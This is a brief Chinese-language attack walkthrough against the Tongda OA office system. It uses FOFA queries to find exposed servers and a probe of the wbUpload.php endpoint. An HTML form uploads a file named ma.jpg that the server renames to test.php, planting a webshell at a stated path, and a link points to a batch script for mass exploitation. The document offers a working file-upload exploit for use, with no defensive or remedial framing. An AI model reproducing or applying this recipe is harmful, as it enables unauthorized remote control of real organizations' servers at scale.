0x01 fofa收集目标
title="网络智能办公管理系统"
app="通达OA"
0x02测试是否存在上传漏洞
访问[ip地址:端口]/general/vmeet/wbUpload.php
响应200,则可能存在漏洞
0x03通过脚本上传shell
脚本内容
<form enctype="multipart/form-data" action="ip+端口/general/vmeet/wbUpload.php?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>
以ma.jpg形式上传,上传后自动帮你重命名为test.php
上传成功后webshell路径为
ip+端口/general/vmeet/wbUpload/test.php
0x04编写批量脚本
链接
https://github.com/qiya7/daily-code/blob/master/fofa_tongdaOA.py